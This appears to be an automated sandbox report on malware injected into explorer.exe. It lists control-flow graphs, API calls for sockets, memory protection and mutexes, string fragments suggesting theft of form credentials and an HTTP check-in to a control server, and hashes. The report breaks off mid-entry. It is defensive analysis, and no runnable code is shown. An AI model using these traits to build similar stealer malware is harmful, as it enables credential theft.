                                                          control_flow_graph 0 e4cef82-e4cefb6 1 e4cefb8-e4cefbc 0->1 2 e4cefd6-e4cefd9 0->2 1->2 3 e4cefbe-e4cefc2 1->3 4 e4cf8fe-e4cf90c 2->4 5 e4cefdf-e4cefed 2->5 3->2 6 e4cefc4-e4cefc8 3->6 7 e4cf8f6-e4cf8f7 5->7 8 e4ceff3-e4ceff7 5->8 6->2 9 e4cefca-e4cefce 6->9 7->4 10 e4cefff-e4cf000 8->10 11 e4ceff9-e4ceffd 8->11 9->2 12 e4cefd0-e4cefd4 9->12 13 e4cf00a-e4cf010 10->13 11->10 11->13 12->2 12->5 14 e4cf03a-e4cf060 13->14 15 e4cf012-e4cf020 13->15 16 e4cf068-e4cf07c call e4cb5b2 14->16 17 e4cf062-e4cf066 14->17 15->14 18 e4cf022-e4cf026 15->18 24 e4cf081-e4cf0a2 16->24 17->16 19 e4cf0a8-e4cf0ab 17->19 18->7 20 e4cf02c-e4cf035 18->20 22 e4cf144-e4cf150 19->22 23 e4cf0b1-e4cf0b8 19->23 20->7 27 e4cf8ee-e4cf8ef 22->27 28 e4cf156-e4cf165 22->28 25 e4cf0ba-e4cf0dc call e4ce942 23->25 26 e4cf0e2-e4cf0f5 23->26 24->19 24->27 25->26 26->27 30 e4cf0fb-e4cf101 26->30 27->7 31 e4cf17f-e4cf18f 28->31 32 e4cf167-e4cf178 call e4cb552 28->32 30->27 36 e4cf107-e4cf109 30->36 33 e4cf1e5-e4cf21b 31->33 34 e4cf191-e4cf1ad call e4cb732 31->34 32->31 39 e4cf22d-e4cf231 33->39 40 e4cf21d-e4cf22b 33->40 43 e4cf1b2-e4cf1da 34->43 36->27 41 e4cf10f-e4cf111 36->41 45 e4cf247-e4cf24b 39->45 46 e4cf233-e4cf245 39->46 44 e4cf27f-e4cf280 40->44 41->27 47 e4cf117-e4cf132 getaddrinfo 41->47 43->33 48 e4cf1dc-e4cf1e1 43->48 52 e4cf283-e4cf2e0 call e4cfd62 call e4cc482 call e4cbe72 call e4d0002 44->52 49 e4cf24d-e4cf25f 45->49 50 e4cf261-e4cf265 45->50 46->44 47->22 51 e4cf134-e4cf13c 47->51 48->33 49->44 53 e4cf26d-e4cf279 50->53 54 e4cf267-e4cf26b 50->54 51->22 63 e4cf2f4-e4cf354 call e4cfd92 52->63 64 e4cf2e2-e4cf2e6 52->64 53->44 54->52 54->53 69 e4cf48c-e4cf4b8 call e4cfd62 call e4d0262 63->69 70 e4cf35a-e4cf396 call e4cfd62 call e4d0262 call e4d0002 63->70 64->63 65 e4cf2e8-e4cf2ef call e4cc042 64->65 65->63 79 e4cf4d9-e4cf590 call e4d0262 * 3 call e4d0002 * 2 call e4cc482 69->79 80 e4cf4ba-e4cf4d5 69->80 85 e4cf398-e4cf3b7 call e4d0262 call e4d0002 70->85 86 e4cf3bb-e4cf3e9 call e4d0262 * 2 70->86 111 e4cf595-e4cf5b9 call e4d0262 79->111 80->79 85->86 101 e4cf3eb-e4cf410 call e4d0002 call e4d0262 86->101 102 e4cf415-e4cf41d 86->102 101->102 103 e4cf41f-e4cf425 102->103 104 e4cf442-e4cf448 102->104 108 e4cf467-e4cf487 call e4d0262 103->108 109 e4cf427-e4cf43d 103->109 110 e4cf44e-e4cf456 104->110 104->111 108->111 109->111 110->111 115 e4cf45c-e4cf45d 110->115 120 e4cf5bb-e4cf5cc call e4d0262 call e4d0002 111->120 121 e4cf5d1-e4cf6ad call e4d0262 * 7 call e4d0002 call e4cfd62 call e4d0002 call e4cbe72 call e4cc042 111->121 115->108 132 e4cf6af-e4cf6b3 120->132 121->132 134 e4cf6ff-e4cf72d call e4cb6b2 132->134 135 e4cf6b5-e4cf6fa call e4cb382 call e4cb7b2 132->135 145 e4cf75d-e4cf761 134->145 146 e4cf72f-e4cf735 134->146 155 e4cf8e6-e4cf8e7 135->155 147 e4cf90d-e4cf913 145->147 148 e4cf767-e4cf76b 145->148 146->145 151 e4cf737-e4cf74c 146->151 157 e4cf779-e4cf784 147->157 158 e4cf919-e4cf920 147->158 152 e4cf8aa-e4cf8df call e4cb7b2 148->152 153 e4cf771-e4cf773 148->153 151->145 156 e4cf74e-e4cf754 151->156 152->155 153->152 153->157 155->27 156->145 163 e4cf756 156->163 159 e4cf795-e4cf796 157->159 160 e4cf786-e4cf793 157->160 158->160 164 e4cf79c-e4cf7a0 159->164 160->159 160->164 163->145 167 e4cf7b1-e4cf7b2 164->167 168 e4cf7a2-e4cf7af 164->168 170 e4cf7b8-e4cf7c4 167->170 168->167 168->170 173 e4cf7f4-e4cf861 setsockopt recv 170->173 174 e4cf7c6-e4cf7ef call e4cfd92 call e4cfd62 170->174 177 e4cf8a3-e4cf8a4 173->177 178 e4cf863 173->178 174->173 177->152 178->177 179 e4cf865-e4cf86a 178->179 179->177 182 e4cf86c-e4cf872 179->182 182->177 185 e4cf874-e4cf8a1 182->185 185->177 185->178
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4458911697.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_e450000_explorer.jbxd
                                                          Similarity
                                                          • API ID: getaddrinforecvsetsockopt
                                                          • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                          • API String ID: 1564272048-1117930895
                                                          • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                          • Instruction ID: d452e772a89f6eb690da3c3d601a8658d44c85046dac260d47aa787de06aa694
                                                          • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                          • Instruction Fuzzy Hash: 18527134618A088FCB69EF68C4947EAB7E2FB54300F50492FC49FC7246DE74A949CB95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0E4CE232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 303 e4ce232-e4ce256 304 e4ce25c-e4ce260 303->304 305 e4ce8bd-e4ce8cd 303->305 304->305 306 e4ce266-e4ce2a0 304->306 307 e4ce2bf 306->307 308 e4ce2a2-e4ce2a6 306->308 310 e4ce2c6 307->310 308->307 309 e4ce2a8-e4ce2ac 308->309 311 e4ce2ae-e4ce2b2 309->311 312 e4ce2b4-e4ce2b8 309->312 313 e4ce2cb-e4ce2cf 310->313 311->310 312->313 314 e4ce2ba-e4ce2bd 312->314 315 e4ce2f9-e4ce30b 313->315 316 e4ce2d1-e4ce2f7 call e4ce942 313->316 314->313 320 e4ce30d-e4ce332 315->320 321 e4ce378 315->321 316->315 316->321 322 e4ce334-e4ce33b 320->322 323 e4ce3a1-e4ce3a8 320->323 324 e4ce37a-e4ce3a0 321->324 325 e4ce33d-e4ce360 call e4ce942 322->325 326 e4ce366-e4ce370 322->326 327 e4ce3aa-e4ce3d3 call e4ce942 323->327 328 e4ce3d5-e4ce3dc 323->328 325->326 326->321 332 e4ce372-e4ce373 326->332 327->321 327->328 329 e4ce3de-e4ce40a call e4ce942 328->329 330 e4ce410-e4ce458 NtCreateFile call e4ce172 328->330 329->321 329->330 339 e4ce45d-e4ce45f 330->339 332->321 339->321 340 e4ce465-e4ce46d 339->340 340->321 341 e4ce473-e4ce476 340->341 342 e4ce478-e4ce481 341->342 343 e4ce486-e4ce48d 341->343 342->324 344 e4ce48f-e4ce4b8 call e4ce942 343->344 345 e4ce4c2-e4ce4ec 343->345 344->321 350 e4ce4be-e4ce4bf 344->350 351 e4ce8ae-e4ce8b8 345->351 352 e4ce4f2-e4ce4f5 345->352 350->345 351->321 353 e4ce4fb-e4ce4fe 352->353 354 e4ce604-e4ce611 352->354 355 e4ce55e-e4ce561 353->355 356 e4ce500-e4ce507 353->356 354->324 361 e4ce616-e4ce619 355->361 362 e4ce567-e4ce572 355->362 358 e4ce538-e4ce559 356->358 359 e4ce509-e4ce532 call e4ce942 356->359 366 e4ce5e9-e4ce5fa 358->366 359->321 359->358 364 e4ce61f-e4ce626 361->364 365 e4ce6b8-e4ce6bb 361->365 367 e4ce574-e4ce59d call e4ce942 362->367 368 e4ce5a3-e4ce5a6 362->368 373 e4ce628-e4ce651 call e4ce942 364->373 374 e4ce657-e4ce66b call e4cfe92 364->374 370 e4ce6bd-e4ce6c4 365->370 371 e4ce739-e4ce73c 365->371 366->354 367->321 367->368 368->321 369 e4ce5ac-e4ce5b6 368->369 369->321 376 e4ce5bc-e4ce5e6 369->376 377 e4ce6f5-e4ce734 370->377 378 e4ce6c6-e4ce6ef call e4ce942 370->378 380 e4ce7c4-e4ce7c7 371->380 381 e4ce742-e4ce749 371->381 373->321 373->374 374->321 391 e4ce671-e4ce6b3 374->391 376->366 401 e4ce894-e4ce8a9 377->401 378->351 378->377 380->321 384 e4ce7cd-e4ce7d4 380->384 387 e4ce77a-e4ce7bf 381->387 388 e4ce74b-e4ce774 call e4ce942 381->388 392 e4ce7fc-e4ce803 384->392 393 e4ce7d6-e4ce7f6 call e4ce942 384->393 387->401 388->351 388->387 391->324 399 e4ce82b-e4ce835 392->399 400 e4ce805-e4ce825 call e4ce942 392->400 393->392 399->351 405 e4ce837-e4ce83e 399->405 400->399 401->324 405->351 406 e4ce840-e4ce886 405->406 406->401
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4458911697.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_e450000_explorer.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID: `
                                                          • API String ID: 823142352-2679148245
                                                          • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                          • Instruction ID: 21560dea2b9888fad5ebf305b3540fcc749c48c1004ed6946036e8df7e5520c6
                                                          • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                          • Instruction Fuzzy Hash: F8222B74A18A099FDB99DF68C4956BAF7E1FB98301F40462FD45ED3250DB30E852CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0E4CFE12 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 447 e4cfe12-e4cfe38 448 e4cfe45-e4cfe6e NtProtectVirtualMemory 447->448 449 e4cfe40 call e4ce942 447->449 450 e4cfe7d-e4cfe8f 448->450 451 e4cfe70-e4cfe7c 448->451 449->448
                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL ref: 0E4CFE67
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4458911697.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_e450000_explorer.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                          • Instruction ID: 89b20b7156a545d3795d64618acb533545a4ee65c5814ca61a7c7d44d88e0ef1
                                                          • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                          • Instruction Fuzzy Hash: 1B015E34668B484F9B88EF6C948522AB7E4FBD9215F000B3FE99AC7254EB64D9414742
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0E4CFE0A Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 452 e4cfe0a-e4cfe6e call e4ce942 NtProtectVirtualMemory 455 e4cfe7d-e4cfe8f 452->455 456 e4cfe70-e4cfe7c 452->456
                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL ref: 0E4CFE67
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4458911697.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_e450000_explorer.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                          • Instruction ID: b48b3caff63106467bed48426664a5aae53c3d754ae18cb50172ca33536b50fd
                                                          • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                          • Instruction Fuzzy Hash: 1F01A734628B884B8784EB2C94412A6B3E5FBCE314F000B3FE59AC3241DB25D5014782
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0E4C98C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • ObtainUserAgentString.URLMON ref: 0E4C99A0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4458911697.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_e450000_explorer.jbxd
                                                          Similarity
                                                          • API ID: AgentObtainStringUser
                                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                          • API String ID: 2681117516-319646191
                                                          • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                          • Instruction ID: 717ac263c5c318000c8120785141aed8195ee74c71207b4cd95240c660fd413e
                                                          • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                          • Instruction Fuzzy Hash: CE31BC31714A0C8BCB55EFA9C8947EEB7E1FB98205F40062FD44ED7240DF788A49878A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0E4C98BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • ObtainUserAgentString.URLMON ref: 0E4C99A0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4458911697.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_e450000_explorer.jbxd
                                                          Similarity
                                                          • API ID: AgentObtainStringUser
                                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                          • API String ID: 2681117516-319646191
                                                          • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                          • Instruction ID: 542fb69d40a3c6bd7598c6b16776294eac297929ca4c56dfefc10e440112aa2e
                                                          • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                          • Instruction Fuzzy Hash: F921B130614A0C9BCB55EFA9C8947EEBBE1FB58205F40461FD45AD7240DF788A09878A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0E4C5B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148synchronizationCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 232 e4c5b66-e4c5b68 233 e4c5b6a-e4c5b6b 232->233 234 e4c5b93-e4c5bb8 232->234 235 e4c5b6d-e4c5b71 233->235 236 e4c5bbe-e4c5c22 call e4cc612 call e4ce942 * 2 233->236 237 e4c5bbb-e4c5bbc 234->237 235->237 238 e4c5b73-e4c5b92 235->238 246 e4c5cdc 236->246 247 e4c5c28-e4c5c2b 236->247 237->236 238->234 249 e4c5cde-e4c5cf6 246->249 247->246 248 e4c5c31-e4c5cd3 call e4d0da4 call e4d0022 call e4d03e2 call e4d0022 call e4d03e2 CreateMutexW 247->248 248->246 263 e4c5cd5-e4c5cda 248->263 263->249
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4458911697.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_e450000_explorer.jbxd
                                                          Similarity
                                                          • API ID: CreateMutex
                                                          • String ID: .dll$el32$kern
                                                          • API String ID: 1964310414-1222553051
                                                          • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                          • Instruction ID: b4d74b1b3250327a7a2797509146e07fce6c184702deaacfdd13349d2a68f0c9
                                                          • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                          • Instruction Fuzzy Hash: AB418B74918A088FCB94EFA8C8947AD77E1FBA8300F04067FC84ADB255EE349945CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0E4C5B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138synchronizationCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4458911697.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_e450000_explorer.jbxd
                                                          Similarity
                                                          • API ID: CreateMutex
                                                          • String ID: .dll$el32$kern
                                                          • API String ID: 1964310414-1222553051
                                                          • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                          • Instruction ID: 17155b5a4d7b0fb8391ff0bfe03b054eeb656190247000417e2c8cb39a7690d3
                                                          • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                          • Instruction Fuzzy Hash: 8A413974918A088FDB84EFA8C498BAD77F1FBA8300F44456FC84EDB256DE349945CB85
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0E4CB72E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 293 e4cb72e-e4cb768 294 e4cb788-e4cb7ab connect 293->294 295 e4cb76a-e4cb782 call e4ce942 293->295 295->294
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4458911697.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_e450000_explorer.jbxd
                                                          Similarity
                                                          • API ID: connect
                                                          • String ID: conn$ect
                                                          • API String ID: 1959786783-716201944
                                                          • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                          • Instruction ID: 6314cb66a2c360bde88dca5e86162815cbba190fa490c4fa34db4d47464b078f
                                                          • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                          • Instruction Fuzzy Hash: B2014834618B188FCB84EF1CE088B55B7E0EB58324F1545AEA90DCB226CA74C8818BC2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0E4CB732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 298 e4cb732-e4cb768 299 e4cb788-e4cb7ab connect 298->299 300 e4cb76a-e4cb782 call e4ce942 298->300 300->299
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4458911697.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_e450000_explorer.jbxd
                                                          Similarity
                                                          • API ID: connect
                                                          • String ID: conn$ect
                                                          • API String ID: 1959786783-716201944
                                                          • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                          • Instruction ID: 71dd9b212a96d9ff0b8ac0f8ccc369631667dedca6d1872d81114ea607c926bd
                                                          • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                          • Instruction Fuzzy Hash: AF011A70618A1C8FCBC4EF5CA088B55B7E0EB59315F1545AEA80DCB226CA74C9818BC2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0E4CB6B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 411 e4cb6b2-e4cb6e5 412 e4cb705-e4cb72d send 411->412 413 e4cb6e7-e4cb6ff call e4ce942 411->413 413->412
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4458911697.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_e450000_explorer.jbxd
                                                          Similarity
                                                          • API ID: send
                                                          • String ID: send
                                                          • API String ID: 2809346765-2809346765
                                                          • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                          • Instruction ID: 6a3b2a3f93b86adcd1f25e3195d07b0bd95294c7d7d24f74b62d9f9aa067f533
                                                          • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                          • Instruction Fuzzy Hash: A8011270518A188FDBC4EF5CE089B2577E0EB58314F1545AED85DCB266C670DC818B82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0E4CB5B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 416 e4cb5b2-e4cb5ea 417 e4cb5ec-e4cb604 call e4ce942 416->417 418 e4cb60a-e4cb62b socket 416->418 417->418
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4458911697.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_e450000_explorer.jbxd
                                                          Similarity
                                                          • API ID: socket
                                                          • String ID: sock
                                                          • API String ID: 98920635-2415254727
                                                          • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                          • Instruction ID: 7855e4a98b86a9c96fe938039e8a57c1c11d63747216636b242d384934d2a1cf
                                                          • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                          • Instruction Fuzzy Hash: A5012C70618A188FCB84EF1CE048B55BBE0FB59314F1545AEE85ECB266C7B0C9818B86
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0E4C32DD Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 421 e4c32dd-e4c3320 call e4ce942 424 e4c33fa-e4c340e 421->424 425 e4c3326 421->425 426 e4c3328-e4c3339 SleepEx 425->426 426->426 427 e4c333b-e4c3341 426->427 428 e4c334b-e4c3352 427->428 429 e4c3343-e4c3349 427->429 431 e4c3354-e4c335a 428->431 432 e4c3370-e4c3376 428->432 429->428 430 e4c335c-e4c336a call e4cdf12 429->430 430->432 431->430 431->432 434 e4c3378-e4c337e 432->434 435 e4c33b7-e4c33bd 432->435 434->435 439 e4c3380-e4c338a 434->439 436 e4c33bf-e4c33cf call e4c3e72 435->436 437 e4c33d4-e4c33db 435->437 436->437 437->426 441 e4c33e1-e4c33f5 call e4c30f2 437->441 439->435 442 e4c338c-e4c33b1 call e4c4432 439->442 441->426 442->435
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4458911697.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_e450000_explorer.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                          • Instruction ID: bb35596d3204788152994ff41683db90e212c7ad7d916577f564bc723541c8f0
                                                          • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                          • Instruction Fuzzy Hash: 42316D78614B09DFDBA4EF2A80482A6B7A1FB54300F4486BFC92DCB216CB749855CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0E4C3412 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 457 e4c3412-e4c3446 call e4ce942 460 e4c3448-e4c3472 call e4d0c9e CreateThread 457->460 461 e4c3473-e4c347d 457->461
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4458911697.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_e450000_explorer.jbxd
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                          • Instruction ID: 57c7a471f2d22266409abc976dbe787671c29522005f6a210662c8d02b7c7e57
                                                          • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                          • Instruction Fuzzy Hash: C5F0F634268A484FD7C8EF2CD44563AF3D0FBE9215F444A3FA54DC3264DA39C9818756
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 101C3D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                          • API String ID: 0-393284711
                                                          • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                          • Instruction ID: 3b3efd4bc629a796d962d1129455ed7a82b6295a199b3d6ce91698894659a12e
                                                          • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                          • Instruction Fuzzy Hash: 10E16A74618F488FC7A5DF68C5857AAB7E0FB68300F804A2EA59BC7241DF34E541CB86
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 101C6792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                          • API String ID: 0-2916316912
                                                          • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                          • Instruction ID: 8c1fddba2f516d3169dad8a05583fcfddd7e46602844e6ecdc50399b10decab6
                                                          • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                          • Instruction Fuzzy Hash: EAB16C30618B488EDB55EF688485AEEB7F1FF68300F50491EE49AC7251EF74E505CB85
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 101C4622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
